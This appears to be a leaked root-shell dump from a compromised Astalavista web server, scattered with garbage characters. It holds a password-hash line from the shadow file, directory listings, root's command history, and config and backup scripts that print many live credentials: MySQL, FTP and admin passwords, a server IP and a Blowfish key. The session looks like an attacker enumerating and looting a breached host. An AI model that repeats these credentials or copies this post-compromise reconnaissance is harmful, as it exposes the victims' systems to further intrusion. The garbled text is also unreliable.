' z4 m g# W z X$ W& u% iastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
) B4 O$ h+ T; ^ ]' f$ e1 c7 T2 a
1 g! `5 m$ B jsh-3.2# cat /etc/motd6 t1 r$ V/ V7 b! e5 e9 g- i0 \
#####################################################
4 Q+ G+ ^, i) H& b' N#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #) f) {% a6 f) u* Q
# |__| [__ | |__| | |__| | | | [__ | |__| # u1 }9 O5 Y3 `% \! J5 k2 b
# | | ___] | | | |___ | | \/ | ___] | | | #
' R6 d l/ U ~. |0 w# #; ]2 P4 I$ R& x9 i, B% Q+ y
#####################################################
- ?( c0 V( r6 _+ X4 c0 d! |" y# #. [( G4 i+ U( G& G# J; V2 C! B$ K
# Admin Contact - 链接标记support@secureservertech.com ## X a0 k$ J' y# s R
# #8 c+ j2 \& }1 _7 B0 n
# Available ShortCuts #
! Z U! x4 A9 E4 H6 m# #3 L9 T2 Y- c) v' _1 D
# nst - list active connections #
0 F* O2 w# g5 ^7 k& a# ddos - shows how many times each ip is connected #
$ s, \( T Z! k# q6 V% l# ltr - restart the webserver #
0 P' u4 _) a8 Z+ u) s5 S2 }7 L# phpc - edit the php config file #
: c- K# u8 g* B5 _3 i9 k# htc - edit the webserver configuration file #" ^% r9 S1 }# I! {# k6 R6 K
# up - uptime #
8 V- _9 W5 v8 N& @' W! z9 M, u2 z# etd - edit the motd of the day file #
& f* ^) ^7 i- a( u& S# htr - start and restart apache if needed #
- W( Z6 b+ J/ L/ C0 k# syng - shows active SYN_RECV connections #
7 J% S- ~% l: j, i4 f) P# synd - syn flood blocker - “synd -h” for usage #
0 T! _6 p6 t8 z0 q$ W#####################################################& h8 _- f) G" P6 U9 j
# NOTES: # k( {. ~6 e/ J$ x. C4 M
# Last Upgrade - 12-08-2008 by JF #- {; i- E4 ]2 e4 W+ S3 d& Q
# My.cnf/Mysql Optimization - 1-28-09 #9 E$ u' T+ ]: @4 C5 i/ M
# #
% X8 q. V$ A$ a v# #" O% T6 C8 W# {* S, t3 z, `7 ~
# #+ }2 [/ D7 P9 H+ @
#####################################################" Q1 w4 K8 v% E. f7 M; \
4 E, y) A' A) ^' V6 x: m! Jsh-3.2# lastlog | grep -v Never$ N1 ~. e* k1 T9 `0 U: l% z
Username Port From Latest
# t: s2 X* O7 K2 hroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009, }( Q2 R( i5 X J! H, {# Q
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
# K2 s2 K& D3 K7 c4 R) Ycom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009. _. Y' Q& f! v# q% ]) T* e) t
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009( {6 L9 P8 b+ o6 ?( C2 U
7 ~' ^, M a- y2 k9 Ssh-3.2# ls -la, f/ T- d- T# A' T8 J* J
total 453376+ d( ~: h! |* P' ]
drwxr-x— 15 root root 4096 Jun 4 08:40 .: p! {8 _: w. { m
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .., o T ?( Z7 \( O
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip; ^+ l5 v3 \6 P
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
2 ?8 |3 x1 L$ K# D& Q0 ]-rw——- 1 root root 16836 Jun 4 07:21 .bash_history/ Y+ y% |5 q7 G3 m/ p
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
$ V8 ]) M2 G. {- a4 n-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile4 q% A7 q: `7 ~! `& v3 C
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc3 E+ i7 R+ m- W0 ?& v' {
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh* l6 Q, I, u {; V3 ?0 y
-rw-r–r– 1 root root 1327 Nov 29 2007 cert+ R' R& O' k8 U. k; t
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
4 ?' F+ e8 Q Ldrwxr-xr-x 4 root root 4096 May 20 2008 .cpan% k. k |. L( a! [
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc' A/ t1 V8 w* v# o, e7 t
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
/ u$ t* ~ ]( t: w Sdrwx—— 2 root root 4096 Oct 28 2007 .elinks5 \8 N9 r( @& s* a
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
9 D/ h: w! m8 K/ ^, E8 j1 i! J-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
3 ^* [# B) }# C" U-rw——- 1 root root 0 Apr 16 13:19 .history; e3 @: I9 D0 t; Y
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
# J+ K# L% ^' J4 v3 ^-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
- K7 S" U7 O6 |1 S3 p5 a-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh- S. l8 N' R. ]6 l1 K1 C
-rw——- 1 root root 35 Jun 2 14:23 .lesshst
7 t+ r7 F1 r- q9 U# Bdrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
+ p7 K9 }6 W- Q/ ]: p, M! A4 j7 Kdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
7 ~& P0 B' ?# h0 W& f; h+ i-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz) j; p/ c4 k0 z0 q3 ~1 V
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2( k- }. P- L0 D6 l I6 Z; g' s
-rwx—— 1 root root 760 Sep 18 2008 lp
|1 R" \; c1 L+ D7 Vdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
3 j2 u: T9 X; E-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz8 {0 }: V( N7 c
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
( z5 z, `; a4 I4 m% pdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9- E6 V- q; w8 u. V4 B# |
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz1 f8 w( V. P) g9 j$ N6 Y
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
0 J+ t0 a* w1 ` k4 G* v-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz, `' G( ?1 s% J ?* n6 k) P. Z
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
2 b9 o! }# P+ S-rw——- 1 root root 41 Oct 19 2007 .my.cnf
! M N! i/ V l" W, a/ l-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
. i0 W' s, k4 d3 H-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
) q; b0 i" C8 ~, n-rw——- 1 root root 41 May 20 2008 .mytop7 t7 o+ ~0 ]' h& Y) Y
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6( G9 ^! d4 ^6 {5 G
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
" D/ w& w) V& w8 f0 wdrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
/ F1 U6 Q. y5 U6 ]1 F-rw——- 1 root root 1462 Sep 21 2007 opt.php+ d+ t1 S3 l- U% y/ W
-rw-r–r– 1 root root 3371 Sep 22 2007 p
! i5 u3 |9 U$ E-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz22 f. M5 R: N% ]4 k' B, w2 I
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
/ E$ G! x3 q1 J: P-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
' z" c# A4 I/ {9 K! i4 V-rw-r–r– 1 root root 887 Nov 28 2007 server.key& S! i# E- \& h8 v& P
drwx—— 2 root root 4096 Oct 10 2008 .ssh
( A7 O4 T# E- K N6 u; Q% g) S-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat; L4 Z' C# } @+ w7 t
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
' ~0 m( \$ Q5 n7 d- N. m-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
" w4 ~! k) Z. Q0 h-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1 V5 k; s }, M2 W, x, h
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp9 ?& L, d) C- u+ L
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh7 e) j9 _) I5 v! c, Y' K0 P2 g2 l
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.05 a$ `. J6 v2 I/ K
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
6 z2 j! k5 v* H* @+ R, p* T9 W5 [! O-rw——- 1 root root 12997 May 16 2008 .viminfo
/ M/ L% W; D* v' Y- ?7 y) P
3 ^/ B" x/ m @8 p; Qsh-3.2# cat .bash_history
6 j/ V- ^4 R- Q[snip]
5 u2 ?4 Z% x) q* n4 |/ v" Lwget cp4sst.com/sstlinux.tar.gz
% H' s( [% W) ?. M6 \% W" wtar zxvf sstlinux.tar.gz
r& w' e5 g/ b$ Pcd linux-2.6.27.10: e7 v( R5 z2 {) ]
sh install.sh
, R2 ?$ @8 r7 z- ? K0 X& L5 q+ Umake bzImage ; make modules ; make modules_install ; make install
% o/ Q) H! S# a( a9 S5 a* Emake clean2 {( n' n- v5 l: r8 l5 B$ y7 R( w( }
service mysqld restart5 |* w2 x. t9 Z0 o+ x0 S) p
[snip]2 d! A5 G# e/ U7 a
cd /usr/sbin/* Y/ C0 C6 t: ^ _
chmod 4777 traceroute+ x! w3 U4 g: y
chmod 4777 ping
1 _; m* g# ?2 K+ _0 O$ I+ s# Z0 Otraceroute -I 链接标记[url]www.astalavista.ch[/url]
5 u' ~' Z m8 I! y. a, w[snip]7 W4 S. P& |( c3 {7 z4 w6 n
vi /etc/csf/csf.conf
% A- O3 v8 @) u1 W/ i2 b* ftraceroute google.ch( c" j" s8 s4 N' T
service csf restart
8 E9 v4 ~: _6 a otracert google.ch
6 R. m# d# J2 E E' O/ C5 `, Cservice csf restart
( D/ X, G- x! {& Qtraceroute 链接标记[url]www.google.ch[/url]
7 _4 G. K9 P! \5 W% t( _8 I5 ]tracert 链接标记[url]www.google.ch[/url]# T6 j9 e! p% b5 P1 x' c+ q9 P# Y
traceroute 链接标记[url]www.google.ch[/url]
8 f |8 c' ~% v0 q& r& V3 K, Tlocate traceroute
. f9 l4 T9 @* \( G& gchown 4755 /bin/traceroute
0 H, w$ a0 K) k/ ichown 4777 /bin/traceroute6 {/ Y q( \" v. i7 T/ B j9 n: X
locate ping$ m- b: F! t& e1 B8 F
chown 4755 /bin/ping
$ n, u; x2 X0 q/ x! k# F3 ~chown 4777 /bin/ping7 @" O/ w4 e. e
cd /bin/
# ]4 T5 p1 d+ u/ Z- u. Xls -ali | grep ping4 ~- s1 Q) {" C8 z" x; D6 f) j8 R
chown root ping
3 ^+ f7 B$ C* }3 f+ C7 S$ qchmod 4755 ping7 V/ z5 S p Z; E$ w
ls -ali | grep traceroute; R/ { d' @& o& I
chown root traceroute
- Q# T( x- z' V' ychmod 4755 traceroute0 t- T( h. e: @( M; [% F& v
ls -ali | grep traceroute
?' X; o+ e _6 i3 E G ttraceroute -I 链接标记[url]www.google.ch[/url]
0 t1 P! y( Q% v7 k4 U A4 v$ [traceroute 链接标记[url]www.google.ch[/url]+ w1 _; R9 ]3 B/ Q3 a
whois pmsantos.ch
% [" M( [, f* w# q7 M& P" I[snip]
?- w# \! q) R9 V: C/ smysql -h com_contrexx2_live < /root/defaultp_ports.sql1 T, E5 ?; L+ }3 a2 M
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql& {% ^$ U2 f2 l3 g" e& p0 Q
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
& |" B+ n! ?8 F; V; N3 ?. m) Kmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql/ B) i& A; v9 g8 D( ^8 f' M# }
top
* B0 e8 l, V4 L9 c5 |) U( U3 [ping ssth.ch& V' s5 T* q! K$ h8 Q
ping asdlkfaljgasd???ljg???lasj.ch6 |( C6 E S) G8 d' A
ping asdlkfaljgasdlasj.ch. ~. r3 s ?" a; J
ping 链接标记[url]www.ssth.ch[/url]
4 M. o# z+ x8 d7 Tping ssth.ch
5 o5 v L9 H/ { V! M; u1 N inslookup 链接标记[url]www.google.ch[/url]
4 [7 O8 F* C' ]5 C5 ^% D7 onslookup 链接标记[url]www.ssth.ch[/url]
) S, G' ^" v* H# u( k pman nslookup3 |7 \, v$ e5 ?# J: T
ping 链接标记[url]www.google.ch[/url]
1 f& s! o* M* D( Znslookup 链接标记[url]www.google.ch[/url] l2 I, ?5 E' e+ B8 @3 g1 A: \
nslookup 链接标记[url]www.google.ch[/url]
7 k% H$ B0 j) B# j" z# ~8 E Xnslookup salfjasdlf.ch
4 |/ L4 r3 Z8 p3 B[snip] c6 I7 d4 ?% P) V
openssl passwd -1 sadf# u! o* W3 V2 j9 D
openssl passwd -1 5cZNHstdTy
6 d8 d' o9 U+ Ymysql7 y! _1 {" Q7 {% T
mysql5 g- x& S9 s( S9 e
locate proftp R5 B; x1 U7 g
vi /etc/proftpd.passwd6 A* T; Q! M/ U# `/ j/ w5 y3 U$ h0 Q
service proftpd restart
, A2 E% [( \9 G' }; E$ _locate proftpd.conf
5 G. Y8 l9 f' @ i) l9 l* J8 Avi /etc/proftpd.conf
$ L, F% @) l3 d( w! g" S4 Mvi /etc/proftpd.passwd
/ P% y7 M( J" n( W* jservice proftpd restart, B1 b" L3 u" @5 ]2 E
[snip]8 q+ Z7 e' b" F; q
/bin/sh /home/com/backup_system/backup.sh
/ a- P9 N X) a& [tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
( U7 u: \* r7 Y& A" o# S* g8 h2 Smysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql0 Q0 j) c3 Z( p9 n: f8 h( c5 D
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql: f+ H* L* z6 X" E- q# o* P
ls -ali, g9 u$ C* n: L# b, i) ?, S
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
' u/ G3 D' M) ^. c1 d2 o% Umysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
. ^4 c5 g: W# J. _9 g9 x7 vcrontab -l, p/ G) X( e4 }1 E$ S
crontab -l
: V1 x4 p3 R- `' ]& Sphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
9 r2 ]& o& J. W7 a8 ?% h$ `/home/com/public_html/modifications/cronjobs/exploits.sh% b- s! N$ a5 d9 W! ?# {
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
+ f4 ^/ [: \; M( W; Z8 E! y8 ctar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz0 ]8 {, N0 n0 R8 T
cd lsws-4.0.37 ?) a- B! B) m6 z2 c
sh install.sh6 @- I! \# W$ b
uptime5 ~) X7 b4 K4 ?4 ^' S- R& w$ }
hdparm -tt /dev/sda
4 o" K* \1 P# ^4 e* B- X# s* biostat6 e7 {: ^( M9 Z9 K, [2 i
yum install iostat, D9 i1 c( Y7 L/ `% Z- ^
iostat4 e3 F/ m1 Y0 x
whereis iostat
& ~- u1 q( k) \yjm clean all
/ d: Y( R! d; \+ u; e+ yyum clean all ; yum -y update
7 G& O# _; K( _! T8 ~; H! | Miostat) G' `+ D! X# n6 W) b5 h
yum install systat2 U# c8 Q1 p0 `9 u8 B/ {9 @
rpm -qa | grep iostat
) W- u6 h& i, M0 ?# Xrpm -qa | grep sysstat' z% @- S( u+ ]8 I( K, J* e% F
rpm -qa | grep systat! D# W+ v4 r# B( A
dmesg -c+ _) Z. z7 C+ n$ g& u0 v6 p) ]% Y& V
sysctl -p* M+ ~) c7 ^+ {
uname -r
# z$ B$ X7 a9 y* L! hcd /usr/src" ?; _9 \/ F. L% T$ D! m5 C7 Z/ y
wget nix101.com/kernels/sstlinux.tar.gz
3 o; ~8 d P- l6 c! ?0 f& G: X; xshutdown -r now
9 I8 |4 M+ ^/ q- X% }# o& J n4 vnano -w /boot/grub/grub.conf
, j3 e' l% Q. ~! u& e
7 ?# `* {% ]/ O' d5 [sh-3.2# cat .my.cnf9 d1 y3 w$ f4 h# J3 e9 w3 {% I
[client] `; b4 k8 o9 N' R, K
user=da_admin
5 _6 ~* e2 e. f1 f* C, g$ Epassword=X9dctmRH
6 U- l9 A6 x: b- ^6 ~+ `
& T9 ?9 q. U6 U. K& Zsh-3.2# cat /home/com/backup_system/backup.sh3 Z8 }9 t2 J% u; z
#!/bin/sh3 |4 c1 U2 P5 n2 `
#####################################################################: Z5 u6 O* n: B5 a; K# R1 A0 F5 {
# #: y( t4 V A+ ^9 I2 O& ~- `4 c% B
# incremental backup for astalavista.com #
7 v9 y$ E: y( u6 c3 o ]# #
4 U, N* b' \) W2 o# F. t# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
6 _9 S, W7 E8 B. u$ D. C# #; B% y. f( _- k! K- m
#####################################################################
8 j. l) H |: L2 ?( c$ v- ?) K[snip]( k! b7 J- Z" M6 r0 H; j4 A: A
PROG_DIR=”/home/com/backup_system”;" b/ l, L4 j& E. M6 R
BACKUP_DIR=”/home/com/backups”;
4 V8 t/ L: U. z0 l% fDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
1 O; d; \+ }5 S# Y' ~7 [# ftp for synology backup server
/ F6 v1 J) h( e* uFTP_HOST=”212.254.194.163″;
! ~* O4 X$ R |FTP_PORT=”21″;
. ^& h+ z3 g. `% _& }8 D# \4 A* j3 rFTP_USER=”astalavista.com”;% B5 g' B$ R/ A" ]% `9 P
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;9 y6 U) N$ ~* p" F, T
FTP_DIR=”/astalavista.com”;: f5 d8 Z y% M# d( y+ Q" v9 q7 A
# database
1 B6 p- o' u; M1 HDB_HOST=”localhost”;
4 \2 b0 Q t4 Q- NDB_USER=”contrexxuser2″;
4 A- ^, p" j: M) g( |DB_PASS=”0fEYNZgXz1pKe”;
+ T) i7 o+ T" [ kDB_DATABASE1=”com_contrexx2_live”;1 g, D( H0 B/ `) f( ]( B4 o+ u
DB_DATABASE2=”com_contrexx2″;2 L8 t( Y" S8 O8 s7 ^) _
[snip]+ O4 q# t" i9 j# N8 O
ftp -in $FTP_HOST $FTP_PORT <<EOF
2 q! U9 i: o* N' f+ y8 i* f( |" |quote USER $FTP_USER
/ V4 D8 r: N% T" b# N% } T |8 ?quote PASS $FTP_PASS
0 v0 p/ `) d$ H7 s, t- |6 _* {cd $FTP_DIR, P& j$ p) P' l5 ^" j' K" L" A2 Y
put $DB_FULLNAME-SQL_Dump.tar) d A! F! d" e/ W2 u; K2 Q
put $BACKUP_FULLNAME-Public_HTML.tar2 q' |4 D( L3 ]; V4 g3 U
close
: P: [% ~* X( w" zbye X& b9 x+ F9 G) A
EOF
! g0 R! z/ k1 J
% C$ L$ ]3 W; Z) o' R+ O: e3 U, dsh-3.2# cd /home
6 r/ U" m6 }, \: y6 a, T/ ksh-3.2# ls -la f. T8 D. R+ P. a( Q3 P
total 120
- N: H1 s: ^8 z- B8 P( ?/ r& F- p/ Hdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .# }* ?1 l' c8 b6 F% R7 J* @+ I
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
Z8 P& q5 ]: P# jdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin2 Y( E7 M* P* e2 f4 k0 a, g# E' _+ F
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
( M/ `# P) h: ?: ^-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
- i" |$ c" N- i# Xdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet' l- e% ?1 p5 J, t" |
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
D4 }" C$ I6 Z+ x7 p7 ?: wdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
/ J' ]0 R/ P/ T+ K- kdrwx–x–x 10 com com 4096 Apr 28 12:40 com
7 b2 G8 B9 Q9 X8 \! u9 h; rdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
3 H3 B8 ?0 c: Q, Qdrwx—— 3 jon jon 4096 Sep 21 2007 jon: Q E9 s) u3 D. j2 `# V
drwx—— 2 root root 16384 Sep 11 2007 lost+found
. m( h/ ?7 Q% R1 vdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
, c' M$ v+ L- \' w3 ]drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
7 B" F; k! R( C9 adrwx—— 2 jon jon 4096 Sep 15 2007 test
, e @2 K" X$ {drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp3 C' J* h8 b) Y/ p. m+ w
! Y& z8 K8 K+ |sh-3.2# cd admin
* x6 {- l$ c3 l6 @1 a* ssh-3.2# ls -la# G! c+ ]8 R" ^ z- L% i
total 1735896
* A/ f. k) }, W7 c# z B+ ?drwx–x–x 9 admin admin 4096 Nov 28 2007 .: q$ [! T+ C4 J2 E
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..9 M% S3 [# K" |' Q3 ]/ Z# w
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
* e$ Y* O7 s) f3 T! x3 D c* udrwx—— 2 admin admin 4096 Sep 28 2007 backups
]- L. q/ e/ y; B; l-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
5 w w0 L7 e. O5 t% s-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
3 w. \0 m, L$ h/ _5 a( I-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
* { G" Z4 x3 Z# h5 g-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc w7 n& F0 y" |9 D
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups( r( Q+ J# Q1 w j6 |4 J/ P
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains) Z! e; x8 X4 P: S; e+ U3 U% c( @
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
6 [8 H. B( Y# z' [-rw-r–r– 1 root root 24 Sep 21 2007 info.php
; x3 |. [. U+ T+ ddrwx—— 2 admin admin 4096 Sep 21 2007 mail# k2 W. U8 J0 ]0 q
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
7 Q8 g+ G9 q; S/ h/ S-rw-r–r– 1 root root 887 Nov 28 2007 server.key, [$ w \6 G+ @4 U
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow; `! ~; q; C G4 F6 ^
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
8 V6 B1 n6 u4 O4 U' d0 D2 C# qdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
+ ^9 R0 e& T4 ?& _1 m } ~
: o7 J, L3 K" k; qsh-3.2# ..
6 F# J: A* s0 \5 m0 q6 W2 lsh-3.2# cd jon
7 N9 Z: }4 A* z# N* f: g, ysh-3.2# ls -la
/ s9 g$ X1 n; t) V* Q- Rtotal 36, U/ L) |, {- o5 A6 w0 O/ R
drwx—— 3 jon jon 4096 Sep 21 2007 .6 b1 y) M" m1 j1 n
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
3 b9 y8 N7 T2 @4 Z, N-rw——- 1 jon jon 53 Sep 21 2007 .bash_history7 x0 v6 B. |# D- z
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
8 a. j: U/ Y: W9 Q5 W8 k& K" I-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile, D, \3 [& E I
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
- [" v) ^. E$ `' `0 O# F3 ~0 y+ B-rw-r–r– 1 root root 24 Sep 21 2007 info.php$ c) c2 `5 U# i7 |5 ]% P0 [
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
( E/ @0 H% c8 H) X! S! H4 _3 a
! M+ s K4 Z7 Z+ N; Gsh-3.2# cd ..) B& q6 f2 F; k0 M" k i3 _; t r
sh-3.2# cd test* K7 M$ F, Y ~
sh-3.2# ls -la' ]; k( F0 Z. {/ Z
total 48
. Z1 e9 j4 Z- x6 Fdrwx—— 2 jon jon 4096 Sep 15 2007 .
# r6 Z( F) u5 {9 b: R) @ {drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..& N# `) X8 J0 k9 X% g
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history# R6 i: `/ X5 ]
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout0 a1 }! E) S6 I7 y
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile9 c$ n- g0 g! L, w+ ?* l- B
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc7 I3 ]' ^; k! k- w) P4 s( k
sh-3.2# cat .bash_history
: q5 e6 d. r) x$ m7 W6 J3 K7 o/usr/bin/mysqladmin -u root password PoliuJhytg67
2 |* @2 {' F1 b1 b! |) {& m& \1 S% e4 O; u7 l( w. ^
sh-3.2# cd ..+ X& g( ^9 q [3 P, e
sh-3.2# cd astanet
) c+ z1 |( L A" P# Q# Ysh-3.2# ls -la
9 _/ J( L# M. I1 Ltotal 52; c! W: k. x$ R- `7 X7 U
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .* n2 _6 E1 N' Q1 t: S# T
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..9 C% q2 {2 p* B/ @
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth) y1 Q6 X8 |$ q
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history e# ]) x) i& g. m" H! H6 D" [
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
; g! Y( p" |' l u-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile* m4 x- e/ W! M( E( P
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc) Z0 s+ }$ A6 F$ i
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
: |+ g; p5 V [; N# j2 e$ V" s8 h7 mdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap$ O& U3 ^# Q, x; {, ?+ W6 q% E2 d+ i
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
5 F/ T! t$ o+ b-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
) P/ N% s0 m/ M" |! [lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html. m# [5 f0 M0 g/ W, @. N
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow1 V2 V0 r" `7 \: S3 s s
' }% U9 m6 n( V) W
sh-3.2# cd auth/
9 A F2 m8 A: V- `8 ssh-3.2# ls -la* W3 Z& J' S: r# N+ G1 u
total 28
% d) d2 m1 ~& P# u6 Ndrwxr-xr-x 2 root root 4096 Dec 23 16:00 .+ j6 `4 J" ~4 u9 X m! R
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
: h& L& Y, E' D( N. }! @, H& h' A-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
2 b& _! l1 B# [' b7 G& J2 g-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
: x/ N5 b) T P5 o& G-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
, j4 @2 Z. ]8 Q4 |6 e ^5 }# n-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting/ }% J2 A7 x4 h' q$ |/ U! I
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd9 [, a# L$ V D% j8 g
5 H2 V/ c( J5 }5 l$ Y$ } Psh-3.2# cat hackercontest.config.inc.php
' h8 R4 f0 |6 W0 a9 Y+ [<?PHP, Z* E- ~& H( m
// Variabeln f?r Verbindung zur Datenbank //) r1 }4 J* D8 W( a0 q
$conxHost = ‘localhost’; // MySQL hostname
) Y; E# D& d7 f" ]( Q4 M$conxUser = ‘hackercontest’; // MySQL user
- H/ b5 n2 [# }8 `2 |+ S9 B$conxPassword = ‘K6m@7dUc’; // MySQL password
9 s* W0 s) e2 |1 ]' }. }$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish2 w9 E* r$ ~5 ?8 K- L# t
?>
- V X% Z3 b3 t" J0 @& ?' K8 Zsh-3.2# cat hosting.config.inc.php
, v2 m$ I! ?/ J+ U<?PHP
: i: c7 p) q2 Z; V5 K' h// Variabeln f?r Verbindung zur Datenbank //
6 g* z- H/ @& M: ~$ P8 j$conxHost = ‘localhost’; // MySQL hostname
3 ` Y2 I9 E0 _- H Y$conxUser = ‘hostinguser’; // MySQL user
# J0 o4 @/ r. B/ A) D$conxPassword = ‘cXvB3981′; // MySQL password
% a! i3 `. M5 ~. S$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish' \" W2 f# f1 H/ `! @; `
?>
